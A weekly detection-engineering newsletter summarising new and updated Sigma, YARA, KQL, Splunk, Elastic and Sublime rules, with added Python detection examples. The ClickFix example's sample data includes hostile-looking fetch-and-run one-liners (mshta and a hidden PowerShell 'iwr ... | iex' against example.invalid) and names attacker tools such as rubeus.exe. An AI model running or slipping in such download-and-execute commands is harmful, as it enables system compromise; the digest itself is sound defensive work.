Detections Digest #20251110
The issue highlights key updates from 14 repos, including 26 new and 38 modified Elastic, Splunk, Sigma, Sublime Security, YARA and KQL detection rules.
This week’s update highlights the most significant changes to detection rules from 14 of the 50+ monitored GitHub repositories. Between Nov 3 and Nov 10, 2025, contributors added 26 new rules and updated 38 existing ones.
Stay informed about the latest changes in detection engineering to improve your threat detection coverage and operational efficiency.
Key Takeaways
Email security detections were updated for multiple phishing and impersonation techniques. New rules identify the Gophish framework, abuse of services like Paperless Post, and malicious attachments like nested archives. Rule modifications improve detection of QR code phishing using OCR, callback scams via NLU, and nested EML attachments, while also hardening exclusions by requiring DMARC validation. (sublime-security/sublime-rules)
New YARA rules target several Windows malware families. Signatures were added for the EggStremeFuel backdoor, WeaselStore infostealer, RoningLoader trojan and SupperBackdoor, and the signature for a specific Gh0st RAT variant was updated. Additionally, detection for the Rhadamanthys malware was broadened with new signatures for its loader and payload components. (reversinglabs/reversinglabs-yara-rules, elastic/protections-artifacts, RussianPanda95/Yara-Rules, kevoreilly/CAPEv2)
Multiple repositories added detections for Windows defense evasion tactics. New Sigma rules identify the ‘ClickFix’ and ‘FileFix’ techniques, which use excessive whitespace to obscure commands. Splunk rules now detect UAC bypass via handle duplication into system binaries like ComputerDefaults.exe. Another new Sigma rule detects the use of certreq.exe as a LOLBAS for file downloads. (SigmaHQ/sigma, splunk/security_content)
Coverage for cloud identity and access management was expanded. New Auth0 rules detect risky configuration changes, such as disabling adaptive MFA or granting excessive API scopes. KQL queries were added to monitor Entra ID (Azure AD) for device registrations from new IP addresses and to audit Authentication Context usage. The M365 impossible travel rule was also updated to cover more identity services. (auth0/auth0-customer-detections, elastic/detection-rules, jkerai1/KQL-Queries, benscha/KQLAdvancedHunting)
New detections focus on correlating suspicious process and network activity. An EQL rule identifies abnormal Kerberos ticket requests by correlating port 88 network traffic from non-standard processes with subsequent authentication events. Other rules detect web browsers launched with unusual flags by unexpected parent processes (a RAT indicator) and internal endpoints connecting to network routers. (elastic/detection-rules, splunk/security_content, Sergio-Albea-Git/Threat-Hunting-KQL-Queries)
💥 Ongoing promo: Free access to CTIChef.com CTI feeds until 2026
To mark the anniversary of the Morris Worm, we’re making our feeds available to you for free for the rest of the year.
The CTI feeds contain all detection rules from the digests and are available as MISP and STIX/TAXII feeds, ready for direct integration into your SIEM, TIP, or SOAR solution.
Table Of Contents
sublime-security/sublime-rules (+7, ✎23)
elastic/detection-rules (+1, ✎4)
elastic/protections-artifacts (+1, ✎1)
SigmaHQ/sigma (+4)
splunk/security_content (+3, ✎2)
Corporate repositories (7)
sublime-security/sublime-rules (+7, ✎23)
+ New rules
New rules detect brand and sender impersonation for credential theft. Detections identify misused Paperless Post assets, sender impersonation via nifty.com, and survey-themed phishing campaigns found using Natural Language Understanding. (Service Abuse: Nifty.com with impersonation, Brand impersonation: Paperless Post, Brand impersonation: Survey request with credential theft indicators)
Two rules were added to detect malicious attachment delivery techniques. One identifies nested archives, specifically a RAR file within a 7z archive, used for evasion. Another detects non-standard ICS calendar files which can be used to exploit parsers or bypass filters. (Attachment: ICS file with non-Gregorian calendar scale, Attachment: 7z Archive Containing RAR File)
Detection coverage is added for a specific phishing framework and a social engineering tactic. One rule identifies Gophish framework tracking URLs. Another detects fabricated email threads sent via Salesforce Marketing Cloud to build false legitimacy. (Spam: Personalized subject and greetings via Salesforce Marketing Cloud, Credential theft: Gophish abuse with hidden tracking image)
✎ Modified rules
Detection of malicious nested emails is broadened across multiple rules. The logic was updated to identify attachments by the ‘.eml’ file extension in addition to the ‘message/rfc822’ MIME type. This change improves coverage for various threats delivered via attached emails, such as phishing, IPFS links, and corporate impersonation. (Callback phishing via extensionless rfc822 attachment, Attachment: EML file with IPFS links, Attachment: RFC822 containing suspicious file sharing language with links from untrusted sender, Impersonation: Internal corporate services, Fake voicemail notification (untrusted sender), Compensation review with QR code in attached EML)
Several rules were updated to harden exclusion logic and reduce false negatives by requiring stricter sender authentication. For HTML smuggling and brand impersonation detections, exclusions for trusted domains now mandate a passing DMARC result, treating missing results as failures. Logic for filtering Microsoft quarantine notifications was also updated to check specific sender addresses and authentication headers. (Attachment: Any HTML file (untrusted sender), Attachment: Any HTML file (unsolicited), Brand impersonation: Booking.com, Brand impersonation: Github, Predatory Academic Journal Solicitation, Brand impersonation: Coinbase)
Detection logic for various impersonation and phishing tactics was improved. Updates target e-signature lures with new keywords (‘AuthentiSign’) and sender display names formatted as phone numbers. USPS impersonation detection was expanded to include sender display name analysis, and a rule was added to flag suspicious sender names in emails from ExactTarget infrastructure. (Credential phishing: Suspicious e-sign agreement document notification, Brand impersonation: USPS, Service Abuse: ExactTarget with suspicious sender indicators)
Detection of callback and QR code phishing was updated with expanded use of Optical Character Recognition (OCR) and Natural Language Understanding (NLU). Rules now apply OCR to message screenshots and images inside EML attachments to find brand names and scam keywords. NLU logic for callback scams was refined, and new logic was added to scan rendered HTML in EMLs for QR codes. (Callback phishing in body or attachment (untrusted sender), Compensation review with QR code in attached EML)
Rules for several specific phishing vectors received targeted updates. Job scam detection now checks for senders using free email providers. A rule targeting Xero abuse now identifies emails from a Mailgun ‘High Risk Pool’ header. Other updates include improved logic for detecting encrypted PDFs and scoping Outlook Express header spoofing detection to inbound mail. (Job scam (unsolicited sender), Credential phishing: Generic document sharing, Xero infrastructure abuse, Headers: Outlook Express mailer, Brand impersonation: SharePoint PDF attachment with credential theft language, Attachment: Encrypted PDF with credential theft body)
elastic/detection-rules (+1, ✎4)
+ New rules
A new EQL rule detects suspicious Kerberos activity. It correlates a network connection to port 88 (Kerberos) from any process except ‘lsass.exe’ with a subsequent Kerberos authentication event on the domain controller (ID 4768, TGT request, or 4769, service ticket request) from the same client IP. This pattern indicates that a non-standard tool, rather than the Windows security subsystem, is requesting tickets, which is typical of credential access or lateral movement tooling. (Suspicious Kerberos Authentication Ticket Request)
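The correlation the rule performs, reduced to a small Python model over constructed sample events. This is an added example for this digest, not the Elastic rule's EQL. It assumes an endpoint connection event that carries the process name and source IP, a domain controller event that carries the client IP, and pairs them only when the ticket event follows the connection within a short window.

```python
"""Correlate port-88 connections from non-lsass processes with Kerberos ticket events."""
from datetime import datetime, timedelta

# Constructed sample events (not real telemetry). "network" records mimic an
# endpoint agent's outbound-connection event; "kerberos" records mimic domain
# controller security events 4768 (TGT requested) and 4769 (service ticket requested).
SAMPLE_EVENTS = [
    {"kind": "network", "ts": "2025-11-05T10:00:00", "host": "WS01",
     "process": "lsass.exe", "src_ip": "10.0.0.5", "dst_port": 88},
    {"kind": "kerberos", "ts": "2025-11-05T10:00:01", "event_id": 4768,
     "client_ip": "10.0.0.5", "account": "alice"},
    {"kind": "network", "ts": "2025-11-05T10:05:00", "host": "WS02",
     "process": "rubeus.exe", "src_ip": "10.0.0.7", "dst_port": 88},
    {"kind": "kerberos", "ts": "2025-11-05T10:05:02", "event_id": 4769,
     "client_ip": "10.0.0.7", "account": "bob"},
    {"kind": "network", "ts": "2025-11-05T10:10:00", "host": "WS03",
     "process": "python.exe", "src_ip": "10.0.0.9", "dst_port": 88},
    # no Kerberos event follows for 10.0.0.9, so this stays a lone connection
    {"kind": "network", "ts": "2025-11-05T10:15:00", "host": "WS04",
     "process": "chrome.exe", "src_ip": "10.0.0.11", "dst_port": 443},
    {"kind": "kerberos", "ts": "2025-11-05T10:15:01", "event_id": 4768,
     "client_ip": "10.0.0.11", "account": "carol"},
    {"kind": "kerberos", "ts": "2025-11-05T10:20:00", "event_id": 4768,
     "client_ip": "10.0.0.13", "account": "dave"},
    {"kind": "network", "ts": "2025-11-05T10:20:05", "host": "WS05",
     "process": "kekeo.exe", "src_ip": "10.0.0.13", "dst_port": 88},
    # the ticket event precedes the connection here, so the ordering check rejects it
]

# lsass.exe normally handles Kerberos on Windows; extend this set for hosts that run
# their own Kerberos client (Java GSS, MIT Kerberos) to avoid noise.
TRUSTED_KERBEROS_CLIENTS = {"lsass.exe"}


def parse_ts(event):
    return datetime.fromisoformat(event["ts"])


def correlate_kerberos(events, window_seconds=30):
    """Return one alert per port-88 connection from an untrusted process that is
    followed, within the window, by a 4768/4769 event for the same client IP."""
    ticket_events = [e for e in events
                     if e["kind"] == "kerberos" and e["event_id"] in (4768, 4769)]
    window = timedelta(seconds=window_seconds)
    alerts = []
    for net in events:
        if net["kind"] != "network" or net["dst_port"] != 88:
            continue
        if net["process"].lower() in TRUSTED_KERBEROS_CLIENTS:
            continue
        t0 = parse_ts(net)
        for tk in ticket_events:
            delta = parse_ts(tk) - t0
            if tk["client_ip"] == net["src_ip"] and timedelta(0) <= delta <= window:
                alerts.append({"host": net["host"], "process": net["process"],
                               "src_ip": net["src_ip"], "event_id": tk["event_id"],
                               "account": tk["account"],
                               "seconds_apart": delta.total_seconds()})
                break  # one alert per connection is enough
    return alerts


if __name__ == "__main__":
    for alert in correlate_kerberos(SAMPLE_EVENTS):
        print(alert)
```

Only the rubeus.exe connection on WS02 is reported: lsass.exe is trusted, python.exe on WS03 never produces a ticket event, chrome.exe did not talk to port 88, and the kekeo.exe connection arrives after its ticket event. In production the same join runs as an EQL sequence, and the window and trusted-process list are the two knobs to tune.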
✎ Modified rules
Detection for suspicious Microsoft 365 logins from impossible or atypical travel locations is expanded. Both rules were updated to cover more identity services by removing a restrictive filter on target IDs. One rule now uses region ISO codes for more accurate geographic checks. (M365 Identity Login from Impossible Travel Location, M365 Identity Login from Atypical Travel Location)
Two rules targeting suspicious Amazon S3 activity were refined for better accuracy. One rule now focuses only on successful ‘PutObject’ events to detect malicious JavaScript uploads. The other, for S3 bucket versioning suspension, has a more specific query and adds detailed investigation guidance for analysts. (AWS S3 Static Site JavaScript File Uploaded, AWS S3 Object Versioning Suspended)
elastic/protections-artifacts (+1, ✎1)
+ New rules
A new YARA rule detects the RoningLoader trojan on Windows systems. The rule scans files and memory, identifying a specific x86 binary signature or the combined presence of strings related to Protected Process Light (PPL) creation, ClipUp.exe usage, and silent regsvr32.exe execution. (Windows_Trojan_RoningLoader_a4e851ac)
✎ Modified rules
The YARA rule for a specific Gh0st RAT variant on Windows was updated. Detection requires four combined indicators in a file or memory: a unique timestamp format, the string “[Pause Break]”, the filename “f-secure.exe”, and an “Accept-Language: zh-cn” HTTP header. (Windows_Trojan_Gh0st_9e4bb0ce)
auth0/auth0-customer-detections (+3)
+ New rules
Three new rules detect security posture degradation in Auth0. They monitor management API events for enabling cross-origin authentication, granting excessive API scopes to applications, and disabling adaptive MFA risk assessment. These detections flag risky configuration changes that could weaken security controls. (Unauthorized or Unexpected Enabling of Cross-Origin Authentication (CORS), Excessive or unexpected Management API scope grants on applications, MFA downgrade - adaptive MFA risk assessment disabled)
reversinglabs/reversinglabs-yara-rules (+2)
+ New rules
Two new YARA rules detect Windows malware. The rules identify the EggStremeFuel backdoor and the WeaselStore infostealer by matching byte patterns of malicious functions, such as C2 communications, system information gathering, and Chrome cookie theft. (Win64_Backdoor_EggStremeFuel, Win64_Infostealer_WeaselStore)
SigmaHQ/sigma (+4)
+ New rules
Three new rules detect the ‘ClickFix’ and ‘FileFix’ defense evasion techniques. These methods use extensive whitespace characters to obscure malicious commands from user view in the Windows Run dialog or File Explorer. The detections target suspicious patterns in explorer.exe command lines and modifications to the RunMRU and TypedPaths registry keys. (Suspicious Space Characters in TypedPaths Registry Path - FileFix, Suspicious Explorer Process with Whitespace Padding - ClickFix/FileFix, Suspicious Space Characters in RunMRU Registry Path - ClickFix)
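A small Python check for the padding pattern these rules look for, run over constructed RunMRU values. It is an added example for this digest, not the Sigma rules' logic. It assumes RunMRU data as Windows stores it (each value followed by a literal \1), treats a run of 20 or more whitespace code points as padding, and includes Unicode spaces because a non-breaking or ideographic space hides the command just as well as ASCII spaces.

```python
"""Detect whitespace-padded commands of the kind ClickFix/FileFix lures leave in
RunMRU, TypedPaths or a process command line."""
import re

# Runs of 20+ whitespace code points (ASCII space, tab, NBSP, en/em/thin space,
# zero-width space, ideographic space). Threshold is this example's choice.
PAD_RUN = re.compile(r"[ \t\u00a0\u2002\u2003\u2009\u200b\u3000]{20,}")


def analyze_padded_command(text):
    """Return None for unpadded text, else the real command and the decoy the user saw."""
    runs = list(PAD_RUN.finditer(text))
    if not runs:
        return None
    pad = max(runs, key=lambda m: m.end() - m.start())
    return {
        "command": text[:pad.start()].strip(),   # what actually executes
        "decoy": text[pad.end():].strip(),        # the reassuring text left visible
        "pad_length": pad.end() - pad.start(),
        "pad_chars": sorted({"U+%04X" % ord(c) for c in pad.group(0)}),
    }


def analyze_runmru_value(value):
    """Windows appends a literal \\1 to each RunMRU value; strip it before analysis."""
    if value.endswith("\\1"):
        value = value[:-2]
    return analyze_padded_command(value)


# Constructed sample registry data modelled on what the Run dialog leaves behind
SAMPLE_RUNMRU = {
    "a": "mshta https://example.invalid/verify" + " " * 180 + "# \u2705 I am not a robot\\1",
    "b": "notepad\\1",
    "c": "powershell -w hidden -c \"iwr example.invalid/p|iex\""
         + "\u00a0" * 64 + "C:\\company\\internal\\report.pdf\\1",  # FileFix-style decoy path
}


def scan_runmru(entries):
    """Map each RunMRU value name to its analysis, keeping only padded entries."""
    hits = {}
    for name, value in entries.items():
        result = analyze_runmru_value(value)
        if result:
            hits[name] = result
    return hits


if __name__ == "__main__":
    for name, hit in scan_runmru(SAMPLE_RUNMRU).items():
        print(name, hit)
```

Reporting the recovered command and the decoy separately is what makes the alert actionable: the analyst sees the mshta or PowerShell one-liner that ran and the "I am not a robot" or document-path text the victim was shown. The same function applies unchanged to TypedPaths values and to explorer.exe command lines.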
A new rule detects the abuse of certreq.exe for file downloads. The detection identifies a known LOLBAS technique by looking for the specific command-line flags -Post and -config used to retrieve files from a remote HTTP server. (Suspicious CertReq Command to Download)
splunk/security_content (+3, ✎2)
+ New rules
Two new rules detect User Account Control (UAC) bypass techniques. One rule identifies suspicious handle duplication into ComputerDefaults.exe or eventvwr.exe using Sysmon ProcessAccess events. The other rule detects ComputerDefaults.exe spawning child processes, a known method for privilege escalation (T1548.002). (Windows Handle Duplication in Known UAC-Bypass Binaries, Windows ComputerDefaults Spawning a Process)
A new rule detects web browser processes running with unusual command-line flags and non-standard parent processes. This behavior can indicate malicious automation or RAT activity, such as that observed with Castle RAT. (Windows Browser Process Launched with Unusual Flags)
✎ Modified rules
An RBA rule that processes Microsoft Defender O365 alerts was modified. The Splunk query’s aggregation logic was changed by altering how the dest field is grouped, which affects the final output events. (Microsoft Defender Incident Alerts)
Detection for anonymous pipe creation via Sysmon Events 17 and 18 was tuned to reduce false positives. The update adds path exclusions for legitimate system processes in C:\Windows\system32\ and C:\Windows\syswow64\. (Windows Anonymous Pipe Activity)
Cyber OSINT Overview is a free weekly newsletter by CTIChef.com that summarizes updates from 80+ sources (government orgs, cybersecurity vendors, threat intel teams, security researchers, and cybersecurity communities) into one overview.
Personal repositories (7)
jkerai1/KQL-Queries (+1)
+ New rules
A new KQL query analyzes Microsoft Entra ID SigninLogs to map the usage of Authentication Contexts. It reports on which Conditional Access Policies mandated a specific context, which user and application triggered it, and the associated resource. This is for auditing and monitoring security policy enforcement. (Entra Identify and Map Authentication Context Usage)
RussianPanda95/Yara-Rules (+1)
+ New rules
A new YARA rule detects the SupperBackdoor malware. The rule identifies files containing four specific strings related to SOCKS initialization, data transfer errors, and a network connectivity check via ping. (SupperBackdoor)
benscha/KQLAdvancedHunting (+1)
+ New rules
A new KQL rule detects new Azure Active Directory device registrations from IP addresses not previously associated with a user’s account. It builds a 29-day baseline of user IP addresses and alerts on registrations from new IPs, excluding those from corporate ranges and common mobile operating systems to lower false positives. (Azure AD Device Registration from New IP Address)
Neo23x0/signature-base (✎6)
✎ Modified rules
Several YARA rules for web shells were modified. These include PHP-based shells like Weevely, ‘h4ntu shell’, and a MySQL administration shell, identified by unique code patterns and UI elements. An ASPX shell detection was broadened by adjusting string matching logic for command execution. (Weevely_Webshell, WEBSHELL_H4ntu_Shell_Powered_Tsoi, webshell_PHP_sql, WEBSHELL_ASPX_Mar21_1)
The YARA rule for Portable Executable files obfuscated with a four-byte XOR key was also updated. Detection checks for the absence of the ‘MZ’ header and verifies the de-XORed ‘PE’ signature at the correct offset, targeting specific packers and crypters. (SUSP_Four_Byte_XOR_PE_And_MZ)
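The same known-plaintext check in Python, as an added example rather than the YARA rule's own condition. It assumes e_lfanew (the PE header offset stored at 0x3C) is below 0x10000, so its two high bytes are zero; that lets the whole key be recovered from offset 0 (which must decode to MZ) and offsets 0x3E and 0x3F. The test buffer is constructed and carries only the header fields the check touches.

```python
"""Recover a 4-byte XOR key from a PE whose header was XOR-encoded and confirm the
'PE' signature at the decoded e_lfanew offset."""
import struct


def xor_bytes(data, key, offset=0):
    """XOR data with a 4-byte key; alignment follows the absolute file offset."""
    return bytes(b ^ key[(offset + i) % 4] for i, b in enumerate(data))


def detect_four_byte_xor_pe(buf):
    """Return the 4-byte key if buf looks like a XOR-encoded PE, otherwise None.

    Known plaintext: bytes 0-1 decode to 'MZ', and bytes 0x3E-0x3F (high half of
    e_lfanew) decode to zero under the assumption e_lfanew < 0x10000. Because 0x3C
    is 4-aligned, those two bytes are encoded with key[2] and key[3] directly.
    """
    if len(buf) < 0x40 or buf[:2] == b"MZ":
        return None  # too small, or not encoded at all
    key = bytes([buf[0] ^ 0x4D, buf[1] ^ 0x5A, buf[0x3E], buf[0x3F]])
    e_lfanew = struct.unpack("<I", xor_bytes(buf[0x3C:0x40], key, 0x3C))[0]
    if e_lfanew < 0x40 or e_lfanew + 4 > len(buf):
        return None
    # e_lfanew need not be 4-aligned, so the key rotation matters here
    if xor_bytes(buf[e_lfanew:e_lfanew + 4], key, e_lfanew) != b"PE\x00\x00":
        return None
    return key


def build_fake_pe(e_lfanew=0x82, size=0x200):
    """Constructed sample: only the fields the check relies on (not a real executable)."""
    buf = bytearray(size)
    buf[0:2] = b"MZ"
    buf[0x3C:0x40] = struct.pack("<I", e_lfanew)
    buf[e_lfanew:e_lfanew + 4] = b"PE\x00\x00"
    return bytes(buf)


if __name__ == "__main__":
    key = b"\x13\x37\xca\xfe"
    encoded = xor_bytes(build_fake_pe(), key)
    print(detect_four_byte_xor_pe(build_fake_pe()))  # None: plain 'MZ' header
    print(detect_four_byte_xor_pe(encoded))          # the recovered key
```

The default e_lfanew of 0x82 is deliberately not a multiple of four, which exercises the key rotation; an aligned offset such as 0x80 works too. A key whose first two bytes are zero leaves MZ intact and is skipped by design, since the file then looks like an ordinary PE.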
kevoreilly/CAPEv2 (+1, ✎1)
+ New rules
A new YARA rule detects the loader component of the Rhadamanthys malware. The logic identifies specific hexadecimal byte patterns related to the loader’s functions, including ntdll interactions and exit procedures, and requires at least two signatures to match. (RhadamanthysLoader)
✎ Modified rules
The YARA rule for the Rhadamanthys malware payload was updated to broaden detection. The change adds three new hexadecimal signatures and removes an exclusionary string condition, increasing the rule’s matching capability. (RhadamanthysLoader)
Sergio-Albea-Git/Threat-Hunting-KQL-Queries (+1)
+ New rules
A new KQL query detects internal endpoints connecting to network routers. The detection correlates device inventory, IP assignments, and network connection events to find unauthorized access or discovery activities within the network. It summarizes both successful and failed connections to identify suspicious traffic patterns. ([LM] - Internal Threat Hunting over Routers Devices)
alexverboon/Hunting-Queries-Detection-Rules (✎1)
✎ Modified rules
The KQL query for detecting obfuscated command lines was improved. It now finds URL-safe Base64 encoding and Unicode dash variants. The minimum length for Base64 detection was lowered to 20 characters, and auditpol.exe was excluded to reduce false positives. (Detection of obfuscated or encoded command lines in process events)
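The checks described here, as an added Python example rather than the KQL query itself, run over constructed process events. The regexes, the 20-character minimum, the dash code points and the auditpol.exe exclusion are this example's choices modelled on the summary; the decoding step (UTF-16LE first, since that is what PowerShell -EncodedCommand uses) goes beyond what the summary describes.

```python
"""Find Base64 runs (standard and URL-safe) and Unicode dash variants in command lines."""
import base64
import ntpath
import re

MIN_B64_LEN = 20  # the lowered minimum token length
B64_STD = re.compile(r"(?<![A-Za-z0-9+/=])[A-Za-z0-9+/]{%d,}={0,2}(?![A-Za-z0-9+/=])" % MIN_B64_LEN)
B64_URL = re.compile(r"(?<![A-Za-z0-9_-])[A-Za-z0-9_-]{%d,}={0,2}(?![A-Za-z0-9_=-])" % MIN_B64_LEN)
UNICODE_DASHES = "\u2010\u2011\u2012\u2013\u2014\u2015\u2212"  # hyphen/dash variants that can replace '-'
EXCLUDED_IMAGES = {"auditpol.exe"}  # example exclusion list mirroring the rule's auditpol.exe exclusion


def try_decode(token, urlsafe):
    """Decode a Base64 token and return it as text when it is printable UTF-16LE or UTF-8."""
    core = token.rstrip("=")
    padded = core + "=" * (-len(core) % 4)
    try:
        raw = base64.b64decode(padded, altchars=b"-_" if urlsafe else None)
    except ValueError:
        return None
    if raw and len(raw) % 2 == 0 and not any(raw[1::2]):
        text = raw.decode("utf-16le")  # PowerShell -EncodedCommand style
    else:
        try:
            text = raw.decode("utf-8")
        except UnicodeDecodeError:
            return None
    return text if text.isprintable() else None


def analyze_cmdline(image, cmdline):
    """Return a list of findings for one process event, or [] for excluded images."""
    if ntpath.basename(image).lower() in EXCLUDED_IMAGES:
        return []
    findings = []
    for m in B64_STD.finditer(cmdline):
        findings.append({"type": "base64", "token": m.group(0),
                         "decoded": try_decode(m.group(0), False)})
    for m in B64_URL.finditer(cmdline):
        token = m.group(0)
        if "-" in token or "_" in token:  # otherwise the standard pass already reported it
            findings.append({"type": "base64url", "token": token,
                             "decoded": try_decode(token, True)})
    dashes = sorted({c for c in cmdline if c in UNICODE_DASHES})
    if dashes:
        findings.append({"type": "unicode_dash", "token": "".join(dashes), "decoded": None})
    return findings


# Constructed process-creation events: (image path, command line)
ENCODED_COMMAND = base64.b64encode("Write-Host hi".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -nop -w hidden -enc " + ENCODED_COMMAND),
    (r"C:\Windows\System32\curl.exe", "curl.exe http://example.invalid/?p=" + "-_" * 12),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe \u2013ExecutionPolicy Bypass \u2013File run.ps1"),
    (r"C:\Windows\System32\auditpol.exe",
     "auditpol.exe /set /subcategory:{0CCE9210-69AE-11D9-BED3-505054503030} /success:enable"),
    (r"C:\Windows\System32\cmd.exe", "cmd.exe /c echo hello"),
]


def scan(events):
    return [analyze_cmdline(image, cmdline) for image, cmdline in events]


if __name__ == "__main__":
    for (image, cmdline), findings in zip(SAMPLE_EVENTS, scan(SAMPLE_EVENTS)):
        print(ntpath.basename(image), findings)
```

The auditpol.exe event shows why an exclusion of that kind is needed: a GUID is a run of hex digits and hyphens well over 20 characters, so a URL-safe Base64 pattern matches it; the same command line from cmd.exe is reported. The en dash in the third event looks like a normal switch prefix on screen but defeats a naive match on "-ExecutionPolicy".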
Feedback
Your input helps us improve! If you spot any issues, mistakes, or omissions in this digest issue, or have any other suggestions, we’d love to hear from you. Contact us at team@rulecheck.io - we value your feedback and are committed to improving the content we produce.
Disclaimer
The summaries in this brief are generated by an LLM based on the provided system and user prompts. While every effort is made to consolidate accurate and relevant insights, the model may occasionally misinterpret, misrepresent, or hallucinate information. Readers are strongly advised to verify all key points by consulting the original sources linked in the brief for complete context and accuracy.
Powered by
This digest is built with BlackStork.
Looking for a customized version of this newsletter? We’d be happy to help — contact us.